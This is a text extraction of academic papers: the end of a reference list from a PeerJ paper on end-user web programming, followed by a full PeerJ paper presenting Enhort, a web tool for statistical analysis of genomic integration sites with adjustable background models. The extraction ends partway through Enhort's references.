New York: ACM, 193–206 DOI 10.1145/2462456.2464443. Leshed G, Haber EM, Matthews T, Lau T. 2008. CoScripter: automating & sharing how-to knowledge in the enterprise. In: CHI ’08. New York: ACM, 1719–1728 DOI 10.1145/1357054.1357323. Lieberman H. 2001. Your wish is my command: programming by example. San Francisco: Morgan Kaufmann. Lee and Bederson (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.91 24/26 https://peerj.com http://dx.doi.org/10.1145/1361348.1361355 http://dx.doi.org/10.1145/1836089.1836091 http://dx.doi.org/10.1145/1925844.1926423 http://dx.doi.org/10.1177/1525822X04266540 http://dx.doi.org/10.1145/1978942.1979444 http://dx.doi.org/10.1145/1922649.1922658 http://dx.doi.org/10.1109/VLHCC.2011.6070381 http://dx.doi.org/10.1145/2560016 http://dx.doi.org/10.1145/2462456.2464443 http://dx.doi.org/10.1145/1357054.1357323 http://dx.doi.org/10.7717/peerj-cs.91 Macías JA, Fabio P. 2008. Customization of Web applications through an intelligent environment exploiting logical interface descriptions. Interacting with Computers 20:29–47 DOI 10.1016/j.intcom.2007.07.007. Mayer M, Soares G, Grechkin M, Le V, Marron M, Polozov A, Singh R, Zorn B, Gulwani S. 2015. User interaction models for disambiguation in programming by example. In: 28th ACM user interface software and technology symposium. New York: ACM. Miller LA. 1974. Programming by non-programmers. International Journal of Man- Machine Studies 6:237–260 DOI 10.1016/S0020-7373(74)80004-0. Miller LA. 1981. Natural language programming: styles, strategies, and contrasts. IBM Systems Journal 20:184–215 DOI 10.1147/sj.202.0184. Miller RC, Chou VH, Bernstein M, Little G, Van Kleek M, Karger D, Schraefel M. 2008. Inky: a sloppy command line for the web with rich visual feedback. In: Proceedings of the 21st annual ACM symposium on User interface software and technology. New York: ACM, 131–140. Nichols J, Lau T. 2008. Mobilization by demonstration: using traces to re-author existing web sites. In: IUI ’08. New York: ACM, 149–158 DOI 10.1145/1378773.1378793. Ott M, Cardie C, Hancock J. 2012. Estimating the prevalence of deception in online review communities. In: WWW ’12. New York: ACM, 201–210 DOI 10.1145/2187836.2187864. Ott M, Choi Y, Cardie C, Hancock JT. 2011. Finding deceptive opinion spam by any stretch of the imagination. In: Proceedings of the 49th annual meeting of the association for computational linguistics: human language technologies - volume 1. HLT ’11. Stroudsburg: Association for Computational Linguistics, 309–319. Pane JF, Myers BA, Ratanamahatana CA. 2001. Studying the language and structure in non-programmers’ solutions to programming problems. International Journal of Human-Computer Studies 54:237–264 DOI 10.1006/ijhc.2000.0410. Rinard MC. 2012. Example-driven program synthesis for end-user programming: techni- cal perspective. Communications of the ACM 55:96–96 DOI 10.1145/2240236.2240259. Rosson MB, Ballin J, Rode J. 2005. Who, what, and how: a survey of informal and professional web developers. In: 2005 IEEE symposium on visual languages and human-centric computing. Piscataway: IEEE, 199–206 DOI 10.1109/VLHCC.2005.73. Toomim M, Drucker SM, Dontcheva M, Rahimi A, Thomson B, Landay JA. 2009. Attaching UI enhancements to websites with end users. In: CHI ’09. New York: ACM, 1859–1868 DOI 10.1145/1518701.1518987. Tuchinda R, Szekely P, Knoblock CA. 2007. Building data integration queries by demon- stration. In: IUI ’07. New York: ACM, 170–179 DOI 10.1145/1216295.1216328. Tuchinda R, Szekely P, Knoblock CA. 2008. Building Mashups by example. In: IUI ’08. New York: ACM, 139–148 DOI 10.1145/1378773.1378792. Wong J, Hong JI. 2007. Making mashups with marmite: towards end-user programming for the web. In: CHI ’07. New York: ACM, 1435–1444 DOI 10.1145/1240624.1240842. Lee and Bederson (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.91 25/26 https://peerj.com http://dx.doi.org/10.1016/j.intcom.2007.07.007 http://dx.doi.org/10.1016/S0020-7373(74)80004-0 http://dx.doi.org/10.1147/sj.202.0184 http://dx.doi.org/10.1145/1378773.1378793 http://dx.doi.org/10.1145/2187836.2187864 http://dx.doi.org/10.1006/ijhc.2000.0410 http://dx.doi.org/10.1145/2240236.2240259 http://dx.doi.org/10.1109/VLHCC.2005.73 http://dx.doi.org/10.1145/1518701.1518987 http://dx.doi.org/10.1145/1216295.1216328 http://dx.doi.org/10.1145/1378773.1378792 http://dx.doi.org/10.1145/1240624.1240842 http://dx.doi.org/10.7717/peerj-cs.91 Wong J, Hong J. 2008. What Do We ‘‘Mashup" when We Make Mashups? In: Proceedings of the 4th international workshop on end-user software engineering. WEUSE ’08. New York: ACM, 35–39 DOI 10.1145/1370847.1370855. Yessenov K, Tulsiani S, Menon A, Miller RC, Gulwani S, Lampson B, Kalai A. 2013. A colorful approach to text processing by example. In: UIST’13. New York: ACM, 495–504 DOI 10.1145/2501988.2502040. Zang N, Rosson MB. 2008. What’s in a mashup? And why? Studying the percep- tions of web-active end users. In: IEEE symposium on visual languages and human-centric computing, 2008, VL/HCC 2008. Piscataway: IEEE, 31–38 DOI 10.1109/VLHCC.2008.4639055. Zang N, Rosson MB. 2009a. Web-active Users Working with Data. In: CHI ’09 extended abstracts on human factors in computing systems. CHI EA’09. New York: ACM, 4687–4692 DOI 10.1145/1520340.1520721. Zang N, Rosson MB. 2009b. Playing with information: how end users think about and integrate dynamic data. In: IEEE symposium on visual languages and human-centric computing, 2009, VL/HCC 2009. Piscataway: IEEE, 85–92 DOI 10.1109/VLHCC.2009.5295293. Zang N, Rosson MB, Nasser V. 2008. Mashups: who? what? why? In: CHI EA’08. New York: ACM, 3171–3176 DOI 10.1145/1358628.1358826. Zimmerman J, Rivard K, Hargraves I, Tomasic A, Mohnkern K. 2009. User-created forms as an effective method of human-agent communication. In: CHI ’09. New York: ACM, 1869–1878 DOI 10.1145/1518701.1518988. Lee and Bederson (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.91 26/26 https://peerj.com http://dx.doi.org/10.1145/1370847.1370855 http://dx.doi.org/10.1145/2501988.2502040 http://dx.doi.org/10.1109/VLHCC.2008.4639055 http://dx.doi.org/10.1145/1520340.1520721 http://dx.doi.org/10.1109/VLHCC.2009.5295293 http://dx.doi.org/10.1145/1358628.1358826 http://dx.doi.org/10.1145/1518701.1518988 http://dx.doi.org/10.7717/peerj-cs.91 work_ftmr4sfzuveahklyxgbwfeyeh4 ---- Submitted 13 November 2018 Accepted 12 May 2019 Published 10 June 2019 Corresponding author Andreas Gogol-Döring, andreas.gogol-doering@mni.thm.de Academic editor James Procter Additional Information and Declarations can be found on page 10 DOI 10.7717/peerj-cs.198 Copyright 2019 Menzel et al. Distributed under Creative Commons CC-BY 4.0 OPEN ACCESS Enhort: a platform for deep analysis of genomic positions Michael Menzel, Peter Koch, Stefan Glasenhardt and Andreas Gogol-Döring MNI, Technische Hochschule Mittelhessen—University of Applied Sciences, Giessen, Hessen, Germany ABSTRACT The rise of high-throughput methods in genomic research greatly expanded our knowledge about the functionality of the genome. At the same time, the amount of available genomic position data increased massively, e.g., through genome-wide profiling of protein binding, virus integration or DNA methylation. However, there is no specialized software to investigate integration site profiles of virus integration or transcription factor binding sites by correlating the sites with the diversity of available genomic annotations. Here we present Enhort, a user-friendly software tool for relating large sets of genomic positions to a variety of annotations. It functions as a statistics based genome browser, not focused on a single locus but analyzing many genomic positions simultaneously. Enhort provides comprehensive yet easy-to-use methods for statistical analysis, visualization, and the adjustment of background models according to experimental conditions and scientific questions. Enhort is publicly available online at enhort.mni.thm.de and published under GNU General Public License. Subjects Bioinformatics, Computational Biology Keywords Virology, Data analysis, Genome annotation, Next-generation sequencing, Integration profiling INTRODUCTION Some viruses like HIV (Craigie & Bushman, 2012) and AAV (Deyle & Russell, 2009) are able to copy their genomic sequence into the genome of an infected cell. This can have severe impact on host cell stability as the integration may hit and disable a gene or a regulatory region. The investigation of characteristics and underlying driving factors for virus integration is not only relevant for virology and infectious diseases research but also for approaches in gene therapy that apply virus-derived vectors and transposons to deliver functional DNA fragments into host cells (Riviere, Dunbar & Sadelain, 2012; Li et al., 2015). Each gene delivery system has its own mechanisms for genomic integration and preferences for choosing integration sites, hence different systems may have different risks for causing undesired side effects. Next Generation Sequencing (NGS) facilitates the genome-wide profiling of integration sites, as they are collected e.g., in investigations of protein binding, virus/transposon integration or DNA methylation. Integration sites are available from databases like the Retrovirus Integration Database (Shao et al., 2016) and are regularly created for novel targeted vectors. Typically, the identified sites are related to a variety of genomic features and any integration preferences are determined by a comparison of actual integration sites to a set of random control sites (Gogol-Döring et al., 2016). A proper background How to cite this article Menzel M, Koch P, Glasenhardt S, Gogol-Döring A. 2019. Enhort: a platform for deep analysis of genomic posi- tions. PeerJ Comput. Sci. 5:e198 http://doi.org/10.7717/peerj-cs.198 https://peerj.com mailto:andreas.gogol-doering@mni.thm.de https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.198 http://creativecommons.org/licenses/by/4.0/ http://creativecommons.org/licenses/by/4.0/ http://doi.org/10.7717/peerj-cs.198 model should mimic all known biases of the signal data originating from experimental or laboratory conditions. If, for example, a profiling method is only capable of detecting integration events that are close to certain enzyme restriction sites then the control sites should also be selected accordingly. Several tools have been published that are capable of processing genomic positions and annotations, like the Genomic HyperBrowser (Sandve et al., 2013). Genome browsers like the UCSC Genome Browser (Kent et al., 2002), IGV (Robinson et al., 2011) or Artemis (Carver et al., 2011) are designed for inspecting single genomic locations. Also custom written scripts are commonly used for the analysis of genomic positions (Cook et al., 2014) or libraries like PyBedTools (Janovitz et al., 2014; Dale, Pedersen & Quinlan, 2011). Once written these scripts have the benefit of being a reusable option to conduct a specific set of analysis on recurring data. However, they are limited by the available functionality because each function has be newly developed. Additionally, comparability across laboratories is afflicted by varying functionality and different implementations of background models. There is yet no specialized tool for genomic positions analysis that combines the features of instant analysis and user defined adaptable background models that mimic known biases. In this paper we present Enhort, a user-friendly web-platform for deep analysis of large sets of genomic positions. Our aim is to accelerate and simplify the data analysis process as well as to standardize it in order to increase reproducibility. Enhort is capable of adjusting background sites used for comparison by user selected covariates. This includes annotation tracks like restriction sites or chromatin accessibility, gene expression tracks and sequence motifs. With covariates it is possible to adjust the background sites selection in a way that they match the investigated sites for a specific track. The adaptation rules out the effects of this annotation for the background. This feature can be used to adjust for experimental bias as well as specific questions. Figure 1 shows the schematic process of data gathering and the usage of Enhort in the workflow of analyzing genomic positions. METHODS Integration sites of viruses are gathered by sequencing infected cells and preprocessing as shown in Fig. 1. These sites are uploaded to Enhort and are intersected with each annotation file to compute fold-change enrichment and χ2 test in comparison to control sites, yielding a measure for effect strength and significance of each annotation respectively. Figure 2 shows the schematic analysis pathway for sites uploaded by a user. Statistical analysis depends on the Apache Commons Math library (https://commons.apache.org/proper/commons- math/) and uses Bonferroni correction for multiple hypothesis testing. The libraries plotly.js (https://plot.ly/javascript/) and Circos (http://circos.ca/) are used for visualization. The results are sorted according to their relevance and presented in conjunction with appropriate figures. Example results for a virus can be seen in Fig. 3A. The software has been designed in a way that analysis results are almost immediately available after upload. In many cases a background model consisting of random sites is not sufficient for an adequate analysis. Some protocols, for example, can only detect integration events that Menzel et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.198 2/13 https://peerj.com https://commons.apache.org/proper/commons-math/ https://commons.apache.org/proper/commons-math/ https://plot.ly/javascript/ http://circos.ca/ http://dx.doi.org/10.7717/peerj-cs.198 Virus VirusDNA Sequencing Reads Genomic Sequence Mapping W et L ab P re pr oc es si ng Site Site Other Data Sources E nh or t Sets of Sites Background Model Generation Statistical Analysis Output Generation Genomic Annotations Results Hit 1 Hit 2 Hit 3 chr 1 chr 2 chr 3 Figure 1 Overview of preparatory work and data gathering for analysis in Enhort. Reads containing vi- ral integration sites are identified and sequenced in the WebLab and mapped to a reference genome. Iden- tified insertion sites are converted to a BED file for the usage in Enhort. Together with genomic annota- tions from public database the analysis in Enhort is conducted to generated analysis of the given integra- tion sites. Full-size DOI: 10.7717/peerjcs.198/fig-1 occurred in close proximity to a restriction site of a specific enzyme, like EcoRI, which cuts inside of GAATTC hexamers (Pingoud & Jeltsch, 2001). Background models should be adapted to mimic the actual integration pattern with regard to any known technical bias. In this case, the control sites should also be selected to be near restriction sites. This can be achieved in Enhort by setting the appropriate genome annotation as a covariate. When selecting the track that contains all possible genomic positions of GAATTC hexamers as covariate, Enhort will generate a set of control sites having exactly the same distribution of distances to the enzyme restriction sites as the actual virus integration sites. Menzel et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.198 3/13 https://peerj.com https://doi.org/10.7717/peerjcs.198/fig-1 http://dx.doi.org/10.7717/peerj-cs.198 Sites are uploaded by a user Background sites are created (1) User sites are tested against the background (2) Tables and figures are shown Export results User selects covariates Length of all integration intervals is determined Random positions are set between 0 and the combined interval length Random positions are spread according to interval locations on the genome Positions for each combination are merged Input: Site count Covariates Genome version Count number of sites inside intervals for user and background sites Contingency table χ2 test, correction for multiple testing and fold change Input: User sites Background sites for each track for each combination for each combination for each track Annotation tracks from databases 1: 2: Figure 2 Flowchart of the procedure of analysis performed by Enhort. Blue boxes show the steps to cre- ate a background model based on multiple covariates. Random positions have to be set for each combi- nation of covariates. Green boxes show the steps to test the user sites against the background sites. The re- sults are returned as a table and converted into figures for the user. Full-size DOI: 10.7717/peerjcs.198/fig-2 Covariates help to adapt the background model both for technical circumstances, for example, restriction sites and for eliminating a bias or biological preferences such as motifs or genetic features. Covariates can also be used to identify dependent or separate weak integration preferences that are covered by stronger effects, as shown in Fig. 3B. MLV integration sites are compared to two different control sets: A random and an altered background, to identify the actual integration preferences; e.g., for histone mark H3K4me3, which is a known preference of MLV (Gogol-Döring et al., 2016). For the validity of statistical testing it is usually indispensable to normalize the background model relative to multiple covariates. For that purpose, Enhort supports the selection of multiple covariates simultaneously in order to further investigate the integration site characteristics. For example, Enhort may create a control set that considers chromatin accessibility, restriction site distance as well as several histone modifications simultaneously. This functionality is needed to build background models for sites that are influenced by multiple factors, e.g., biological and technical biases. A set of additional features listed in the following table: 1. Statistical analysis for annotation tracks: (a) Fold change (b) χ2 test (c) Kolmogorov–Smirnov test 2. Hotspot analysis (Fig. 4C) 3. Position depended enrichment (Fig. 4A) 4. Background models based on: Menzel et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.198 4/13 https://peerj.com https://doi.org/10.7717/peerjcs.198/fig-2 http://dx.doi.org/10.7717/peerj-cs.198 Figure 3 Output view example, generated by Enhort when analyzing Murine Leukemia Virus (MLV) integration sites in CD4 + T cells (Roth, Malani & Bushman, 2011). (A) The results are presented in a table containing for each annotation the p value, effect size and a visual representation of the integration. The annotations are ranked by effect strength. (B) Effect of covariate selection. The upper diagram con- tains integration frequencies of MLV compared to random sites for a selection of annotations. This virus is known for preferentially integrating near transcription start sites (TSS) and H3K4me3 histone marks (LaFave et al., 2014). The lower diagram shows the same data after selecting H3K4me3 as covariate. The adapted background model is generated in a way that control sites and MLV integration sites have the same frequency relative to H3K4me3. This also changed the control site frequencies for other annotations: MLV integration is no longer enriched but depleted in CpG islands when compared to the adapted back- ground model. Full-size DOI: 10.7717/peerjcs.198/fig-3 (a) Inside and outside of annotations (b) Distance to annotations (c) Scored annotations (d) Sequence logo 5. Upload background sites 6. Comparing effects of different background models 7. Batch analysis of multiple integration sets 8. Heatmaps to compare integration sets (Fig. 4B) 9. Custom annotation tracks 10. Blend annotation tracks 11. Export results as R code and CSV files Enhort is separated into a lightweight, web-based user interface and a high performance back-end server attached to a SQLite database storing meta-information about the annotations fetched from DeepBlue (Albrecht et al., 2016). Results from Enhort are instantaneously available as seen in Table 1 where the run times for different input sizes are shown. Our application currently offers 1402 annotation tracks from 97 cell Menzel et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.198 5/13 https://peerj.com https://doi.org/10.7717/peerjcs.198/fig-3 http://dx.doi.org/10.7717/peerj-cs.198 Table 1 Analysis execution times for different usual site counts, annotation tracks from hg19 and co- variate counts. (Back-end server: SuperMicro SuperServer 4048B-TRFT 4x Intel Xeon E7-8867v3 with 2048GB DDR3 ECC LR). Track count 23 1,127 Covariate count 0 2 5 0 2 5 Site count Execution time (ms) 150k 877 1,188 4,668 8,538 10,436 12,540 125k 717 1,103 5,628 5,509 7,552 7,975 100k 749 817 5,085 3,724 4,672 8,673 75k 624 571 4,019 4,905 4,397 9,633 50k 470 555 5,455 4,736 5,844 10,451 25k 308 351 4,628 3,246 3,091 8,111 lines and tissues for human genome assemblies hg19 and hg38, downloaded from UCSC Genome Browser (Fujita et al., 2011), Encode (ENCODE Project Consortium, 2004), ChIP-Atlas (http://chip-atlas.org), BLUEPRINT Epigenome (Adams et al., 2012) and Roadmap Epigenomics (Roadmap Epigenomics Consortium et al., 2015) using the DeepBlue Epigenomic Data Server (Albrecht et al., 2016). RESULTS AND DISCUSSION Literature review We reviewed the relevance of Enhort for contemporary research by systematically searching PubMed, Google Scholar, and several review articles for publications concerning the analysis of genomic integration sites. The publications include virus integration site analysis for HIV, MLV, HRP-2, SIV, foamy virus, HPV, AAV and transposons such as piggyBac, LINE-1, Alu and sleeping beauty. In total we identified 59 relevant publications. Details on the reviewed publications and methodological analysis are available in the Table S1. Of these publications 19 used completely random control sites, only six used adapted control sites. The data analyses presented in 37 (63%) publications could have been entirely performed with our tool. Six further publications use at least some methods provided by Enhort. We assume that if they had the opportunity to use Enhort the authors would have saved a lot of effort writing custom analysis scripts. Data re-analysis To further present the capabilities of Enhort we re-analyzed integration sites of the PiggyBac transposon (PB) published by Gogol-Döring et al. (2016) using Enhort. Results from Wilson, Coates & George (2007) are used for comparison. PB integration characteristics show a preference for genes, exons, introns, highly expressed genes, DNase I hypersensitive sites, H3K4me3 and open chromatin structures (Wilson, Coates & George, 2007; Li et al., 2013). We uploaded the PB integration sites to Enhort, selected all relevant tracks and finally exported the results. Figure 5A shows the log fold changes for a selection of annotations for PB against a random background in grey. Figure 5B shows the sequence logos for the Menzel et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.198 6/13 https://peerj.com http://chip-atlas.org http://dx.doi.org/10.7717/peerj-cs.198#supp-1 http://dx.doi.org/10.7717/peerj-cs.198 Figure 4 Additional plots generated by Enhort. (A) Circos plot (Krzywinski et al., 2009) of position de- pendent enrichment over all chromosomes for MLV for the most significant tracks. (B) Heatmap for a set of three integration data sets against various annotations. The values are log2-fold changes of the numbers of integration vs control sites falling into a given annotation. Star symbols mark statistically significant changes. The same background sites are used for the comparisons. The background sites are adapted to in- tegrate only inside the sequence contigs. (C) Integration hotspots across the genome for MLV. The color intensity of the thin bars show the integration ratio inside of the respective genomic region. Full-size DOI: 10.7717/peerjcs.198/fig-4 PB integration sites and the random background. The barplots were created using the R-export feature of Enhort. The key feature of the PB integration preference is the TTAA motif in which all integrations occur. To precisely analyze the preferences of PB integration the background model has to be adapted to replicate the TTAA motif preference. This can be achieved using Enhort by creating a set of pseudo-random control sites that are located only inside a TTAA sequence. To achieve this, we simply selected the sequence logo as a covariates. Enhort takes genomic positions from a pre-sampled set of positions where each position has a probability based on the similarity between the surrounding sequence and the TTAA sequence. The results are shown in Fig. 5C where the background sites and PB show a similar motif after the motif is added as a covariate using Enhort. The motif adaption also changes the observed integration characteristics seen in Fig. 5A. The relative decreased integration of PB into coding exons is changed to a significant preference, because CpG islands are less likely to be hit by a site from the adapted background model, as TTAA occurs relatively less frequent in CpG islands. The same applies to DNAse cluster regions, TSS and exons, where the significance of integration is enriched in comparison to a random background. Only a small change for the enrichment in introns and genes is visible. Overall Menzel et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.198 7/13 https://peerj.com https://doi.org/10.7717/peerjcs.198/fig-4 http://dx.doi.org/10.7717/peerj-cs.198 Figure 5 Analysis of PB integration sites. (A) Log fold changes of PB integration sites in relation to sev- eral annotations against a random and an adapted background model. Changing the background model to adapt the TTAA motif changes the observation of several integration preferences. (B) The PB motif and random sites motif, corresponding with the random background bars in (A). (C) Motif of the random sites after adaption to the PB motif using Enhort. Full-size DOI: 10.7717/peerjcs.198/fig-5 Table 2 Log fold changes and integration ratios of Wilson, Coates & George (2007) in comparison to Enhort for two PB integration site sets. Enhort Wilson et al. Enhort Wilson et al. Enhort Wilson et al. Annotation track Fold change Fold change PB (%) PB (%) Random (%) Random (%) RefSeq genes 1.32 1.46 63.08 48.8 47.93 33.2 TSS (±5 kb) 2.14 3.00 20.8 16.2 9.7 5.4 CpG islands (±1 kb) 5.52 2.00 12.99 3.8 2.35 1.9 CpG islands (±5 kb) 2.82 0.96 22.85 7.7 8.09 8.3 Repeats: LINE 0.71 0.76 7.72 12.7 10.90 16.7 SINE 0.50 0.54 3.8 6.0 7.64 11.1 LTR 0.56 1.84 2.79 6.8 5.0 3.7 DNA 1.61 1.18 1.87 4.0 1.61 3.4 this indicates that beside the TTAA preference of PB there are additional mechanisms that alter the integration preferences. Using the background adaption feature of Enhort it would be possible to test different hypothesis against the data and build a model that explains the integration preferences. To further review the analytic capabilities of our software, the integration counts of PB sites are compared to published results from Wilson, Coates & George (2007). The comparison can be seen in Table 2. An increased integration of PB into RefSeq genes, inside the 5kb-TSS window, as well as a preference for CpG islands is observable for both analyses. Wu et al. (2003) published a study on MLV and HIV stating that MLV favors TSS regions, whereas HIV does not display a strong preference towards TSS regions. The Menzel et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.198 8/13 https://peerj.com https://doi.org/10.7717/peerjcs.198/fig-5 http://dx.doi.org/10.7717/peerj-cs.198 Table 3 Comparison between fold changes of Wu et al. (2003) and Enhort over different annotations on the same integration sites. Wu et al. Enhort HIV MLV HIV MLV HIVa MLVa HIVb MLVb RefSeq genes 2.58* 1.5* 1.7* 1.4* 1 1 1 1 Housekeeping genes – – 3.7 * 1.36 2.22* 1.12 2.05* 1.04 CpG islands (±1 kb) 1 8* 0.41 6.24* 0.35 6.17* 0.31 4.09* TSS (±5 kb) 2.5* 4.7* 1.34 2.3* 1.14 2.02* 1 1 H4K20me1 – – 1.71* 1.56* 1.34* 1.52* 1.36* 1.42* H3K4me2 – – 1.23 21.7* 1.48 21.29* 1.09 15.2* H3K27ac – – 0.9 24.52* 1.01 22.79* 0.83 20.12* Notes. *P <0.002. awith RefSeq genes as covariate. bwith RefSeq genes and TSS (± 5 kb) as covariates. available integration sites were uploaded to Enhort and analyzed using the batch tool with a random 10,000 site background model. The results from Enhort show a similar integration pattern as stated in Wu et al. (2003) (Table 3). Except for CpG islands for HIV where Wu et al. found a near random integration and we found a decreased integration. For further review, HIV and MLV integration sites were uploaded independently to Enhort, and RefSeq genes added as covariate. This background model had only a little effect on MLV as the preference for TSS and CpG islands only changed slightly, indicating that the preference for TSS is not due to a preference for RefSeq genes. For the HIV integration sites the housekeeping genes, which are a known preference of HIV (Craigie & Bushman, 2012), are still statistically significant against this background model. Finally, RefSeq genes and TSS (±5 kb) were both used as covariates together, showing that the integration ratio of MLV into CpG islands with a (±1 kb) window decreases slightly. This shows that the integration into the CpG islands is probably not a side effect of the preference for TSS or genes. The combined background model with RefSeq genes and TSS does not have any influence on the HIV fold changes compared to the previous background model. The creation of each background model and comparing the results was possible using built-in features of Enhort. We further added histone modifications to the analysis showing that H4K20me1 is significantly enriched for both integration sets and does not change significantly for the different background models. This indicates that the histone modification preferences is an additional effect, only slightly influenced by the preference for genes and TSS. H3K4me2 and H3K27ac are known preferences of MLV (De Ravin et al., 2014) and show a high fold change for all background models. With the available database it would be easy to add numerous additional annotations for comparison. We have shown that Enhort is capable of reproducing integration site analysis with less effort and additionally offers easy-to-use mechanisms to create more sophisticated analysis using adaptable background models. The exact annotation files were not available for comparison, so it was not possible to produce the exact numbers. However, Enhort uses Menzel et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.198 9/13 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.198 the same calculation principle. With the same annotations and sites the results by Enhort would be the same as in the referenced publications. CONCLUSION In this publication we present Enhort, a fast and easy-to-use analyzing platform for genomic positions. Based on a comprehensive library of genomic annotations, Enhort provides a wide range of methods to analyze large sets of sites. In contrast to multi-purpose software such as bioconductor, Enhort enables scientists to analyze data without programming effort or extensive manual work. Our literature review shows that Enhort is able to perform most of the analyses commonly used in the investigation of integration sites. The re-analysis of Wilson, Coates & George (2007) and Wu et al. (2003) demonstrates that Enhort is able to reproduce analyses from literature with little effort. It was not possible to reproduce the exact values, because the version of the annotation was not recorded in the publications. However, more detailed insights can be made using adaptable background models. This was shown in the comparison of HIV and MLV from Wu et al. against different control sites. Most publications use very simple background models for statistical analysis of integration data and could potentially be improved using better background models. Enhort provides methods to easily create more sophisticated background models for improving both the accuracy and the range of possible analyses. Complex background models can be used to identify weak effects and segregate driving factors for integration, find a minimal set of annotations to mimic integration characteristics, as well as to eliminate technical biases. In conclusion, this shows that Enhort will be a valuable tool for further analyses of genomic positions, no matter if these positions are derived from virus integration, sequence motifs, enzyme restrictions, histone modifications, or protein binding. ADDITIONAL INFORMATION AND DECLARATIONS Funding This work was supported by the Hessen State Ministry for Higher Education, Research and the Arts. The funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. Grant Disclosures The following grant information was disclosed by the authors: Hessen State Ministry for Higher Education, Research and the Arts. Competing Interests The authors declare there are no competing interests. Author Contributions • Michael Menzel conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, prepared figures and/or Menzel et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.198 10/13 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.198 tables, performed the computation work, authored or reviewed drafts of the paper, approved the final draft. • Peter Koch contributed reagents/materials/analysis tools, performed the computation work. • Stefan Glasenhardt contributed reagents/materials/analysis tools, performed the computation work. • Andreas Gogol-Döring prepared figures and/or tables, authored or reviewed drafts of the paper, approved the final draft. Data Availability The following information was supplied regarding data availability: The source code and build instructions are available at https://git.thm.de/mmnz21/ Enhort. Supplemental Information Supplemental information for this article can be found online at http://dx.doi.org/10.7717/ peerj-cs.198#supplemental-information. REFERENCES Adams D, Altucci L, Antonarakis S, Ballesteros J, Beck S, Bird A, Bock C, Boehm B, Campo E, Caricasole A, Dahl F, Dermitzakis E, Enver T, Esteller M, Estivill X, Ferguson-Smith A, Fitzgibbon J, Flicek P, Schacht C, Willcocks S. 2012. BLUEPRINT to decode the epigenetic signature written in blood. Nature Biotech- nology 30(3):224–226 DOI 10.1038/nbt.2153. Albrecht F, List M, Bock C, Lengauer T. 2016. DeepBlue epigenomic data server: programmatic data retrieval and analysis of epigenome region sets. Nucleic Acids Research 44(W1):W581–W586 DOI 10.1093/nar/gkw211. Carver T, Harris SR, Berriman M, Parkhill J, McQuillan JA. 2011. Artemis: an inte- grated platform for visualization and analysis of high-throughput sequence-based ex- perimental data. Bioinformatics 28(4):464–469 DOI 10.1093/bioinformatics/btr703. Cook Lucy B, Melamed A, Niederer H, Valganon M, Laydon D, Foroni L, Taylor GP, Matsuoka M, Bangham CRM. 2014. The role of HTLV-1 clonality, proviral structure, and genomic integration site in adult T-cell leukemia/lymphoma. Blood 123(25):3925–3931 DOI 10.1182/blood-2014-02-553602. Craigie R, Bushman FD. 2012. Hiv dna integration. Cold Spring Harbor Perspectives in Medicine 2(7):Article 006890 DOI 10.1101/cshperspect.a006890. Dale RK, Pedersen BS, Quinlan AR. 2011. Pybedtools: a flexible Python library for manipulating genomic datasets and annotations. Bioinformatics 27(24):3423–3424 DOI 10.1093/bioinformatics/btr539. De Ravin SS, Su L, Theobald N, Choi U, Macpherson JL, Poidinger M, Symonds G, Pond SM, Ferris AL, Hughes SH, HL M, X W. 2014. Enhancers are major targets for murine leukemia virus vector integration. Journal of Virology 88(8):4504–4513 DOI 10.1128/JVI.00011-14. Menzel et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.198 11/13 https://peerj.com https://git.thm.de/mmnz21/Enhort https://git.thm.de/mmnz21/Enhort http://dx.doi.org/10.7717/peerj-cs.198#supplemental-information http://dx.doi.org/10.7717/peerj-cs.198#supplemental-information http://dx.doi.org/10.1038/nbt.2153 http://dx.doi.org/10.1093/nar/gkw211 http://dx.doi.org/10.1093/bioinformatics/btr703 http://dx.doi.org/10.1182/blood-2014-02-553602 http://dx.doi.org/10.1101/cshperspect.a006890 http://dx.doi.org/10.1093/bioinformatics/btr539 http://dx.doi.org/10.1128/JVI.00011-14 http://dx.doi.org/10.7717/peerj-cs.198 Deyle DR, Russell DW. 2009. Adeno-associated virus vector integration. Current Opinion in Molecular Therapeutics 11(4):442–447. ENCODE Project Consortium. 2004. The ENCODE (ENCyclopedia of DNA elements) project. Science 306(5696):636–640 DOI 10.1126/science.1105136. Fujita PA, Rhead B, Zweig AS, Hinrichs AS, Karolchik D, Cline MS, Goldman M, Barber GP, Clawson H, Coelho A, Diekhans M, Dreszer TR, Giardine BM, Harte RA, Hillman-Jackson J, Hsu F, Kirkup V, Kuhn RM, Learned K, Li CH, Meyer LR, Pohl A, Raney BJ, Rosenbloom KR, Smith KE, Haussler D, Kent WJ. 2011. The UCSC Genome Browser database: update 2011. Nucleic Acids Research 39(suppl 1)D876–D882 DOI 10.1093/nar/gkq963. Gogol-Döring A, Ammar I, Gupta S, Bunse M, Miskey C, Chen Wei, Uckert W, Schulz TF, Izsvák Z, Ivics Z. 2016. Genome-wide profiling reveals remarkable parallels between insertion site selection properties of the MLV retrovirus and the piggyBac transposon in primary human CD4+ T cells. Molecular Therapy 24(3):592–606 DOI 10.1038/mt.2016.11. Janovitz T, Oliveira T, Sadelain M, Falck-Pedersen E. 2014. Highly divergent integration profile of adeno-associated virus serotype 5 revealed by high-throughput sequencing. Journal of virology 88(5):2481–2488 DOI 10.1128/JVI.03419-13. Kent WJ, Sugnet CW, Furey TS, Roskin KM, Pringle Tom H, Zahler AM, Haussler D. 2002. The human genome browser at UCSC. Genome Research 12(6):996–1006 DOI 